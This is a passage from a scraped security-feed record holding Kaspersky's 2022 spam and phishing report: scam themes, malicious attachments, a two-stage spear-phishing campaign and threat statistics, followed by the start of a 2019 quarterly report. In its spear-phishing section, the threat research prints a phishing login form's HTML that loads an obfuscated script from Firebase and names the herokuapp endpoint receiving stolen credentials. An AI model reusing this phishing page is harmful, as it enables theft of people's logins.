addition to offering &quot;prizes&quot;, encouraged users to visit &quot;dating sites&quot; \u2014 in fact, populated by bots \u2014 where the victims would no doubt be asked to pay for a premium account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150322/spam-phishing-report-2022-26.png>)\n\nWe blocked upward of a million scam emails sent via legitimate forms in 2022.\n\n### Blackmail in the name of law enforcement agencies\n\nExtortion spam is nothing new. In such emails, attackers usually claim that the recipient has broken the law and demand money. In 2022, these mailings not only continued, but also evolved. For example, there was virtually no text in the messages: the user was either asked to open an attached PDF file to find out more, or they received threats in the form of an image with text. In addition, the geography of mailings widened in 2022.\n\nThe essence of the message, as in similar emails sent earlier, was that a criminal case was going to be opened against the recipient due to allegedly visiting sites containing child pornography.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150404/spam-phishing-report-2022-27.png>)\n\nTo avoid serious consequences, the attackers urged the victim to respond as soon as possible to the sender and &quot;settle the matter&quot;. Most likely, the scammers would ask for a certain amount of money to be paid in further correspondence for the victim&#x27;s name to be removed from the &quot;criminal case&quot;. In 2022, we blocked over 100,000 blackmail emails in various countries and languages, including French, Spanish, English, German, Russian and Serbian.\n\n### Exploiting the news\n\nSpammers constantly use major world events in their fraudulent schemes. The 2022 geopolitical crisis was no exception. Throughout the year, we saw mailings aimed at English-speaking users proposing transferring money, usually to a Bitcoin wallet, to help the victims of the conflict in Ukraine. Scammers often demand the transfer of money to Bitcoin wallets, as it is more difficult to trace the recipient through cryptocurrency transactions than through the bank ones. Blackmail demanding payment in cryptocurrency used to prevail in spam. Now, attackers have started collecting Bitcoin for charity.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150431/spam-phishing-report-2022-28.png>)\n\nThe news agenda was also used in other scam mailings. For example, in early July, our solutions blocked 300,000 emails where fraudsters were requesting help on behalf of a Russian millionaire, who allegedly wanted to invest money and avoid sanctions. Another mailing said that the European Commission had decided to give away a fund created by Russian oligarchs, and the email recipient might be lucky to get a piece of this pie.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150458/spam-phishing-report-2022-29.jpg>)\n\nMore and more &quot;business offers&quot; are appearing among spam mailings, and they exploit the current information agenda. Due to economic sanctions in 2022, enterprising businessmen offered replacements for goods and services from suppliers who left the Russian market. For example, spammers actively advertised services of a company transporting people to Russia. The email text emphasized the fact that many transport companies refused to provide such services.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153541/spam-phishing-report-2022-30.png>)\n\nThere were also spam mailings where various companies offered to replace popular international software with Russian equivalents or solutions developed in third countries. In addition, there were spam propositions for intermediary services to open a company or bank account in neighboring countries, such as Armenia, as well as offers of assistance in accepting payments from foreign partners.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153600/spam-phishing-report-2022-31.png>)\n\nThe shortage of printer paper in Russia in March and April 2022 spawned a wave of related ads offering paper at discount prices.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153622/spam-phishing-report-2022-32.png>)\n\nSpammers in 2022 also actively marketed their promotional mailing services as alternative advertising to unavailable promotion via platforms such as Instagram. For example, in April we blocked around a million of such mailings.\n\nAgainst the backdrop of sanctions and the accompanying disruption of supply chains, there has been an increase in spam offering goods and services from Chinese suppliers. In 2022, our filter blocked more than 3.5 million emails containing such offers, and the number of them was growing, from around 700,000 in the first quarter to more than a million in the fourth.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153708/spam-phishing-report-2022-33.png>)\n\n### Spam with malicious attachments\n\nEmployees shifting to remote work during the pandemic and the associated growth of online communications spurred the active development of various areas of phishing, both mass and targeted. Attackers have become more active in imitating business correspondence, not only targeting HR-specialists and accountants, as before the pandemic, but also employees in other departments. In 2022, we saw an evolution of malicious emails masquerading as business correspondence. Attackers actively used social engineering techniques in their emails, adding signatures with logos and information from specific organizations, creating a context appropriate to the company&#x27;s profile, and applying business language. They also actively exploited off the current news agenda and mentioned real employees from the company supposedly sending the emails. Spammers faked their messages as internal company correspondence, business correspondence between different organizations, and even as notifications from government agencies.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153731/spam-phishing-report-2022-34.png>)\n\nMasking malicious emails as business correspondence has become a major trend in malicious spam in 2022. Attackers tried to convince the recipient that it was a legitimate email, such as a commercial offer, a request for the supply of equipment, or an invoice for the payment of goods. For example, throughout the year, we encountered the following scheme. Attackers gained access to real business correspondence (most likely by stealing correspondence from previously infected computers) and sent malicious files or links to all of its participants in response to the previous email. This trick makes it harder to keep track of malicious emails, and the victim is more likely to fall for it.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153756/spam-phishing-report-2022-35.png>)\n\nIn most cases, either the [Qbot](<https://securelist.com/qakbot-technical-analysis/103931/>) Trojan or [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/>) was loaded when the malicious document was opened. Both can be used to steal user data, collect information about the corporate network, and spread additional malware, such as ransomware. Qbot also allows you to gain access to emails and steal them for further attacks.\n\nMailings imitating notifications from various ministries and other government organizations have become more frequent in the Runet. Emails were often designed to take into account the specific activities of the organizations they were pretending to be. The sender&#x27;s addresses copied the logic of email addresses in the relevant agencies, and the malicious attachment was disguised as some kind of specialized document, such as &quot;key points of the meeting&quot;. For example, malicious code was found in one of these mailings that exploited a vulnerability in the Equation Editor module, the formula editor in Microsoft Office.\n\nThe perpetrators did not ignore the news agenda. In particular, the malware was distributed under the guise of call-up &quot;as part of partial mobilization&quot; or as a &quot;new solution&quot; to safeguard against possible threats on the internet &quot;caused by hostile organizations&quot;.\n\nIn the second case, the program installed on victim&#x27;s computer was in fact a crypto-ransomware Trojan.\n\n## Two-stage spear phishing using a known phish kit\n\nIn 2022, we saw an increase in spear (or targeted) phishing attacks targeting businesses around the world. In addition to typical campaigns consisting of one stage, there were attacks in several stages. In the first email, scammers in the name of a potential client asked the victim to specify information about its products and services. After the victim responds to this email, the attackers start a phishing attack.\n\nKey facts:\n\n * Attackers use fake Dropbox pages created using a well-known phishing kit\n * The campaign targets the sales departments of manufacturers and suppliers of goods and services\n * Attackers use SMTP IP addresses and _From_ domains provided by Microsoft Corporation and Google LLC (Gmail)\n\n### Statistics\n\nThe campaign began in April 2022, with malicious activity peaking in May, and ended by June.\n\n_Number of emails related to a two-step targeted campaign detected by Kaspersky solutions ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161029/01-en-spam-report-2022-diagrams.png>))_\n\n### How a phishing campaign unfolds\n\nAttackers send an email in the name of a real trade organization requesting more information about the victim company&#x27;s products. The email text looks plausible and has no suspicious elements, such as phishing links or attachments. A sender&#x27;s email address from a free domain, like gmail.com, may raise doubts. The email on the screenshot below is sent from an address in this domain, and the company name in the _From_ field is different to its name in the signature.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153835/spam-phishing-report-2022-36.jpg>)\n\n**_Example of the first email_**\n\nIt is worth noting that the use of free domains is not typical for spear phishing in the name of organizations, because such domains are rarely used in business. Most often in targeted attacks, attackers either use [spoofing of the legitimate domain](<https://securelist.com/email-spoofing-types/102703/>) of the organization they are pretending to be, or register domains similar to the original one. In addition, Google and Microsoft are pretty quick in blocking email addresses spotted sending spam. This is the most likely reason why attackers used different addresses in the _From_ header (where the email came from) and _Reply-to_ header (where the reply will go when clicking &quot;Reply&quot; in your email client). This means the victim responds to another address, which may be located in another free domain, such as outlook.com. The address in the _Reply-to_ header is not used for spam, and correspondence with it is initiated by the victim, so it is less likely to be blocked quickly.\n\nAfter victims respond to a first email, attackers send a new message, asking them to go to a file-sharing site and view a PDF file with a completed order, which can be found via the link.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153858/spam-phishing-report-2022-37.jpg>)\n\n**_An email with a phishing link_**\n\nBy clicking the link, the user is taken to a fake site generated by a well-known phishing kit. It is a fairly simple tool that generates phishing pages to steal credentials from specific resources. Our solutions blocked fake WeTransfer and Dropbox pages created with this kit.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153925/spam-phishing-report-2022-38.jpg>)\n\n**_A fake WeTransfer page created using the same phish kit as the target campaign sites_**\n\nIn the phishing campaign described above, the phishing site mimics a Dropbox page with static file images and a download button. After clicking any element of the interface, the user is taken to a fake Dropbox login page that requests valid corporate credentials.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153950/spam-phishing-report-2022-39.png>)\n\n**_A fake Dropbox page_**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154022/spam-phishing-report-2022-40.jpg>)\n\n**_Login page with a phishing form_**\n\nWhen victims attempt to log in, their usernames and passwords are sent to https://pbkvklqksxtdrfqkbkhszgkfjntdrf[.]herokuapp[.]com/send-mail.\n \n \n <form name=\"loginform\">\n <div class=\"form-group\">\n <label for=\"\">Email Address</label>\n <input type=\"email\" id=\"email\" class=\"form-control\" name=\"email\" placeholder=\"email Address\">\n <div class=\"email-error\"></div>\n </div>\n <div class=\"form-group\">\n <label for=\"\">Password</label>\n <input type=\"password\" id=\"password\" class=\"form-control\" name=\"password\" placeholder=\"Password\">\n <div class=\"password-error\"></div>\n </div>\n <div class=\"form-group btn-area\">\n <button class=\"download-btn\" id=\"db\" type=\"submit\">Download</button>\n </div>\n </form>\n </div>\n <script src=\"https://firebasestorage.googleapis.com/v0/b/linktopage-c7fd6.appspot.com/o/obfuscated.js?alt=media&amp;token=1bb73d28-53c8-4a1e-9b82-1e7d62f3826b\"></script>\n\n**_HTML representation of a phishing form_**\n\n### Victims\n\nWe have identified targets for this campaign around the world, including the following countries: Russia, Bosnia and Herzegovina, Singapore, USA, Germany, Egypt, Thailand, Turkey, Serbia, Netherlands, Jordan, Iran, Kazakhstan, Portugal, and Malaysia.\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nIn 2022, an average of 48.63% of emails worldwide were spam, representing a 3.07 p.p. increase on 2021. Over the course of the year, however, the share of spam in global email traffic has gradually declined, from 51.02% in the first quarter to 46.16% in the fourth.\n\n_Share of spam in global email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161102/02-en-spam-report-2022-diagrams.png>))_\n\nThe most active month in terms of spam was February 2022, with junk traffic accounting for 52.78% of all email correspondence. June was in second place (51.66%). December was the calmest, only 45.20% of emails in this month were spam.\n\nOn Runet, the proportion of spam in email traffic is generally higher than worldwide. In 2022, an average of 52.44% of emails were junk mailings. At the same time, the trend for a gradual shift in ratio in favor of legitimate correspondence can also be seen. We saw the largest share of spam in Runet in the first quarter, with 54.72% of all emails, and by the fourth quarter it had dropped to 49.20%.\n\n_Proportion of spam in Runet email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161132/03-en-spam-report-2022-diagrams.png>))_\n\nEven though the second quarter (53.96%) was quieter in terms of spam than the first, the most active month in the Russian segment of the internet was June (60.16%). Most likely, the share of spam in June, both in Russia and globally, was influenced by the surge in mailings with offers from Chinese factories that we observed in that month. And the quietest month in Runet was December (47.18%), the same as globally.\n\n### Countries and territories \u2014 sources of spam\n\nIn 2022, the share of spam from Russia continued to grow, from 24.77% to 29.82%. Germany (5.19%) swapped places with mainland China (14.00%), whose share increased by 5.27 percentage points. Third place is still held by the United States (10.71%).\n\n_TOP 20 countries and territories \u2014 sources of spam, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161204/04-en-spam-report-2022-diagrams.png>))_\n\nThe Netherlands remained in fifth place (3.70%), its share decreased compared to 2021. Sixth and seventh places went to Japan (3.25%) and Brazil (3.18%), whose shares rose by 0.89 and 3.77 p.p., respectively. Next come the UK (2.44%), France (2.27%) and India (1.82%).\n\n### Malicious mail attachments\n\nIn 2022, our Mail Anti-Virus detected 166,187,118 malicious email attachments. That&#x27;s an increase of 18 million from the previous year. This component caused most triggers in March, May, and June 2022.\n\n_Number of Mail Anti-Virus hits, January \u2014 December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161240/05-en-spam-report-2022-diagrams.png>))_\n\nThe most common malicious email attachments in 2022, as in 2021, were [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) Trojan stealers (7.14%), whose share decreased slightly. [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (4.89%) moved up to second place, and [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (4.61%) spreading as archived electronic documents moved down to third place. The fourth most common malware were vulnerability exploits [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (4.33%) in Microsoft Equation Editor. In 2022, attackers used them significantly more often than [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) exploits in the same component (1.80%). This vulnerability was more widespread in 2021 and has now dropped to tenth place.\n\n_TOP 10 malware families spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161308/06-en-spam-report-2022-diagrams.png>))_\n\n[ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) Trojans (3.27%), sent in the form of disk images, moved up to number five, and the sixth most common was the [Guloader](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Guloader/>) downloader family (2.65%), which delivers remotely controlled malware to victims&#x27; devices. They are closely followed by the [Badur](<https://threats.kaspersky.com/en/threat/Trojan.PDF.Badur/>) family (2.60%), PDF files containing links to web resources with questionable content, and in eighth place is the infamous [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/106290/>) botnet (2.52%). Law enforcement shut this down in early 2021, but by fall, attackers had restored the infrastructure and were actively distributing it in 2022. More recently, Emotet has been used to deliver other malware to victims&#x27; devices, particularly ransomware. The ninth most popular family was [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (2.10%), which creates malicious tasks in the task scheduler.\n\n_TOP 10 types of malware spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161339/07-en-spam-report-2022-diagrams.png>))_\n\nThe list of the most common malware sent via email usually corresponds to the list of families. As in 2021, attackers mostly distributed the same instances from the TOP 10 families.\n\n### Countries and territories targeted by malicious mailings\n\nSpain remains the leader in terms of blocked malicious attachments in 2022 (8.78%), which is a slight decrease compared to 2021 (9.32%). The share of Russia (7.29%), on the other hand, increased slightly. Third place went to Mexico (6.73%), and fourth place to Brazil (4.81%), whose share was virtually unchanged from the previous reporting period.\n\n_TOP 20 countries and territories targeted by malicious mailings, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161409/08-en-spam-report-2022-diagrams.png>))_\n\nIn Italy, 4.76% of all detected malicious attachments were blocked in 2022. The country is followed by Vietnam (4.43%) and Turkey (4.31%). The percentage of Mail Anti-Virus detections on computers of users from Germany (3.85%) continued to decrease. The share in the United Arab Emirates (3.41%) also decreased slightly, dropping to ninth place, while Malaysia (2.98%) remained in tenth place.\n\n## Statistics: phishing\n\nIn 2022, the number of phishing attacks increased markedly. Our Anti-Phishing system prevented 507,851,735 attempts to follow a phishing link, roughly double the number in 2021.\n\n### Map of phishing attacks\n\nIn 2022, the geography of phishing attacks changed dramatically. Attempts to click phishing links were most often blocked on devices from Vietnam (17.03%). In 2021, this country was not among the TOP 10 most attacked countries and territories. Macau is in second place (13.88%), also absent from last year&#x27;s ranking. Madagascar is in third place (12.04%), which was seventh in 2021. In addition to Vietnam and Macau, Algeria (11.05%), Malawi (10.91%) and Morocco (10.43%) appeared at the top of the list of most attacked countries and territories. Ecuador (11.05%) moved up to fifth place, while Brunei (10.59%) dropped one place to seventh. Brazil (10.57%) and Portugal (10.33%) moved from first and third places to eighth and tenth, respectively, and France, which was second in 2021, left the TOP 10.\n\nTOP 10 countries and territories by share of attacked users:\n\n**Country/territory** | **Share of attacked users*** \n---|--- \nVietnam | 17.03% \nMacau | 13.88% \nMadagascar | 12.04% \nAlgeria | 11.05% \nEcuador | 11.05% \nMalawi | 10.91% \nBrunei | 10.59% \nBrazil | 10.57% \nMorocco | 10.43% \nPortugal | 10.33% \n \n**_* Share of users encountering phishing out of the total number of Kaspersky users in that country/territory, 2022_**\n\n### Top-level domains\n\nAs in previous years, the majority of phishing pages were hosted in the COM domain zone, but its share almost halved, from 31.55% to 17.69%. Zone XYZ remained in second place (8.79%), whose share also decreased. The third most popular domain among attackers was FUN (7.85%), which had not previously received their attention. The domain is associated with entertainment content, which is perhaps what attracted fraudsters to it.\n\n_Most frequent top-level domains for phishing pages in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161441/09-en-spam-report-2022-diagrams.png>))_\n\nDomains ORG (3.89%) and TOP (1.80%) swapped places relative to 2021 but remained in fourth and fifth places. In addition to this, the top ten domain zones in most demand among cybercriminals included: RU (1.52%), COM.BR (1.13), DE (0.98%), CO.UK (0.98%) and SE (0.92%).\n\n### Organizations under phishing attacks\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nIn 2022, pages impersonating delivery services had the highest percentage of clicks on phishing links blocked by our solutions (27.38%). Online stores (15.56%), which were popular with attackers during the pandemic, occupied second place. Payment systems (10.39%) and banks (10.39%) ranked third and fourth, respectively.\n\n_Distribution of organizations targeted by phishers, by category, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161508/10-en-spam-report-2022-diagrams.png>))_\n\nThe share of global internet portals (8.97%) almost halved, with almost as many phishing resources targeting users of smaller web services (8.24%). Social networks (6.83%), online games (2.84%), messengers (2.02%) and financial services (1.94%) round complete the TOP 10 categories of sites of interest to criminals.\n\n### Hijacking Telegram accounts\n\nIn 2022, our solutions stopped 378,496 phishing links aimed at hijacking Telegram accounts. Apart from a spike in phishing activity throughout June, when the number of blocked links exceeded 37,000, the first three quarters were relatively quiet. However, by the end of the year, the number of phishing attacks on the messenger&#x27;s users increased dramatically to 44,700 in October, 83,100 in November and 125,000 in December. This increase is most likely due to several large-scale Telegram account hijacking campaigns that we [observed in late 2022](<https://www.kaspersky.ru/blog/telegram-takeover-contest/34472/>) (article in Russian).\n\n_Number of clicks on phishing links aimed at hijacking a Telegram account worldwide, and in Russia specifically, January \u2014 December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161540/11-en-spam-report-2022-diagrams.png>))_\n\nIt is of note that the majority of phishing attacks were aimed at users from Russia. While in the first months of 2022 their share was approximately half of the total number of attacks worldwide, since March 70\u201390% of all attempts to follow phishing links by Telegram users were made by Russian users.\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn 2022, our mobile solution blocked 360,185 attempts to click on phishing links from messengers. Of these, 82.71% came from WhatsApp, 14.12% from Telegram and another 3.17% from Viber.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161612/12-en-spam-report-2022-diagrams.png>))_\n\nPhishing activity on WhatsApp is down slightly since 2021. On average, the Safe Messaging component blocked 816 clicks on fraudulent links per day. The first half of the year was the most turbulent, and by the third quarter, phishing activity in the messenger had dropped sharply.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154605/spam-phishing-report-2022-42.png>)\n\n**_Dynamics of phishing activity on WhatsApp in 2022 (weekly number of detected links shown)_**\n\nThe largest number of phishing attempts on WhatsApp, approximately 76,000, was recorded in Brazil. Russia is in second place, where over the year, the Chat Protection component prevented 69,000 attempts to go to fraudulent resources from the messenger.\n\n_TOP 7 countries and territories where users most often clicked phishing links in WhatsApp ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161647/13-en-spam-report-2022-diagrams.png>))_\n\nUnlike WhatsApp, the number of phishing attacks on Telegram almost tripled in 2022 compared to the previous reporting period. On average, our solutions blocked 140 attempts to follow phishing links in this messenger per day. The peak of activity came at the end of June and beginning of July, when the number of blocked clicks could have exceeded 1,500 per week. Phishing activity on Telegram also increased sharply at the end of the year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154645/spam-phishing-report-2022-41.png>)\n\n**_Dynamics of phishing activity on Telegram in 2022 (weekly number of detected links shown)_**\n\nIn Russia, we recorded the largest number (21,000) of attempts to click a link to fraudulent resources from Telegram. Second place went to Brazil, where 3,800 clicks were blocked.\n\n_TOP 7 countries and territories where users most frequently clicked phishing links from Telegram ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161717/14-en-spam-report-2022-diagrams.png>))_\n\n## Conclusion\n\nTimes of crisis create the preconditions for crime to flourish, including online. Scams promising compensation and payouts from government agencies, large corporations and banks are likely to remain popular among cybercriminals next year. The unpredictability of the currency market and departure of individual companies from specific countries&#x27; markets will likely affect the number of scams associated with online shopping. At the same time, the COVID-19 topic, popular with cybercriminals in 2020 and 2021, but already beginning to wane in 2022, will finally cease to be relevant and will be replaced by more pressing global issues.\n\nRecently, we&#x27;ve seen an increase in targeted phishing attacks where scammers don&#x27;t immediately move on to the phishing attack itself, but only after several introductory emails where there is active correspondence with the victim. This trend is likely to continue. New tricks are also likely to emerge in the corporate sector in 2023, with attacks generating significant profits for attackers.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-02-16T08:00:07", "type": "securelist", "title": "Spam and phishing in 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2023-02-16T08:00:07", "id": "SECURELIST:49E48EDB41EB48E2FCD169A511E8AACD", "href": "https://securelist.com/spam-phishing-scam-report-2022/108692/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:29:15", "description": "\n\n## Quarterly highlights\n\n### Valentine's Day\n\nAs per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable confidential information out of starry-eyed users, such as bank card details. The topics exploited by cybercriminals ranged from online flower shops to dating sites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142701/Spam-report-Q1-2019-1.png>)\n\nBut most often, users were invited to order gifts for loved ones and buy medications such as Viagra. Clicking/tapping the link in such messages resulted in the victim's payment details being sent to the cybercriminals.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142735/Spam-report-Q1-2019-2.png>)\n\n### New Apple products\n\nLate March saw the unveiling of Apple's latest products, which fraudsters were quick to pounce on, as usual. In the run-up to the event, the number of attempts to redirect users to scam websites imitating official Apple services rose significantly.\n\n_Growth in the number of attempts to redirect users to phishing Apple sites before the presentation _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143724/apple-en.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142839/Spam-report-Q1-2019-4.png>)\n\n_Fake Apple ID login pages_\n\nScammers polluted Internet traffic with phishing emails seemingly from Apple to try to fool recipients into following a link and entering their login credentials on a fake Apple ID login page.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143511/Spam-report-Q1-2019-5.png>)\n\n### Fake technical support\n\nFake customer support emails are one of the most popular types of online fraud. The number of such messages has grown quite significantly of late. Links to fake technical support sites (accompanied by rave reviews) can be seen both on dedicated forums and social networks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142930/Spam-report-Q1-2019-6.png>)\n\n_Fake \"Kaspersky Lab support service\" accounts_\n\nAll these profiles that we detected in Q1 have one thing in common: they offer assistance in matters related to one or another company products, with the promise of specially trained, highly qualified staff supposedly ready and waiting to help. Needless to say, it is not free. Not only do users not have their issue resolved, they are likely to be defrauded as well.\n\n### New Instagram \"features\"\n\nLast year, we [wrote](<https://securelist.com/spam-and-phishing-in-q2-2018/87368/>) that phishers and other scammers had moved beyond mailing lists and into the realm of the popular social network Instagram. This trend continued, with fraudsters exploiting the service to the full \u2014 not only leaving links to phishing resources in comments, but also registering accounts, paying for advertising posts, and even enticing celebrities to distribute content.\n\nCybercriminal advertisers use the same methods to lure victims by promising products or services at what seems a great price.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143002/Spam-report-Q1-2019-7.png>)\n\nAs usual in such schemes, the \"buyer\" is asked for all sorts of information, from name to bank details. It goes without saying that all the user gets is their private data compromised.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143034/Spam-report-Q1-2019-8.png>)\n\n### Mailshot phishing\n\nIn Q1, we registered several phishing mailings in the form of automatic notifications seemingly on behalf of major services in charge of managing legitimate mailing lists. Scammers tried to force recipients to follow the phishing links under the pretext of verifying an account or updating payment information. Sometimes fake domains were used with names similar to real services, while other times hacked sites redirected the victim to a fake authorization form.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143105/Spam-report-Q1-2019-9.png>)\n\n### Financial spam through the ACH system\n\nIn Q1, we observed a large surge in spam mailings aimed at users of the Automated Clearing House (ACH), a US-based e-payment system that processes vast quantities of consumer and small-business transactions. These mailings consisted of fake notifications about the status of transfers supposedly made by ordinary users or firms. Such messages contained both malicious attachments (archives, documents) and links to download files infected with malware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143129/Spam-report-Q1-2019-10.png>)\n\n### \"Dream job\" offers from spammers \n\nIn Q3, we [registered spam messages](<https://securelist.com/spam-and-phishing-in-q3-2018/88686/>) containing \"dream job\" offers. This quarter, we logged another major mailing topic: messages were sent supposedly on behalf of well-known companies sure to attract lots of potential applicants. Recipients were invited to register in the job search system for free by installing a special app on their computer to access the database. When trying to download the program from the \"cloud service,\" the user was shown a pop-up window titled DDoS Protection and a message with a link pointing to the site of an online recruitment company (the names of several popular recruitment agencies were used in the mailing). If the user followed it, a malicious DOC file containing Trojan.MSOffice.SAgent.gen was downloaded to their computer, which in turn downloaded Trojan-Banker.Win32.Gozi.bqr onto the victim's machine.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143159/Spam-report-Q1-2019-11.png>)\n\n### Ransomware and cryptocurrency\n\nAs we expected, cybercriminal interest in cryptocurrency did not wane. Spammers continue to wring cryptocurrency payments out of users by means of \"sextortion\" \u2014 a topic we [wrote about last year](<https://securelist.com/spam-and-phishing-in-2018/93453/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143235/Spam-report-Q1-2019-12.png>)\n\nIn Q1 2019, we uncovered a rather unusual scam mailing scheme whereby cybercriminals sent messages in the name of a CIA employee allegedly with access to a case file on the recipient for possession and distribution of digital pornographic materials involving minors.\n\nThe fictitious employee, whose name varied from message to message, claimed to have found the victim's details in the case file (which were actually harvested from social networks/online chats/forums, etc.). It was said to be part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the \"employee\" happened to know that the victim was a well-off individual with a reputation to protect \u2014 for which a payment of 10,000 dollars in bitcoin was demanded.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143314/Spam-report-Q1-2019-13.png>)\n\nPlaying on people's fear of private data being disclosed, the scammers employed the same tricks as last year, mentioning access to personal data, compromising pornographic materials, etc. But this time, to make the message more convincing and intimidating, a CIA officer was used as a bogeyman.\n\n### Malicious attacks on the corporate sector\n\nIn Q1, the [corporate sector of the Runet was hit by a malicious spam attack](<https://www.kaspersky.ru/blog/phishing-wave-shade/22251/>). The content imitated real business correspondence, and the messages themselves were seemingly from partners of the victim company.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143345/Spam-report-Q1-2019-14.png>)\n\nWe also observed malicious mailings aimed at stealing the financial information of international companies through distributing fake messages in the name of a US company allegedly providing information services. Besides the attachment, there was nothing at all in the message. The lack of text was seemingly intended to prompt the victim to open the attached document containing Trojan.MSOffice.Alien.gen, which then downloaded and installed Trojan-Banker.Win32.Trickster.gen on the 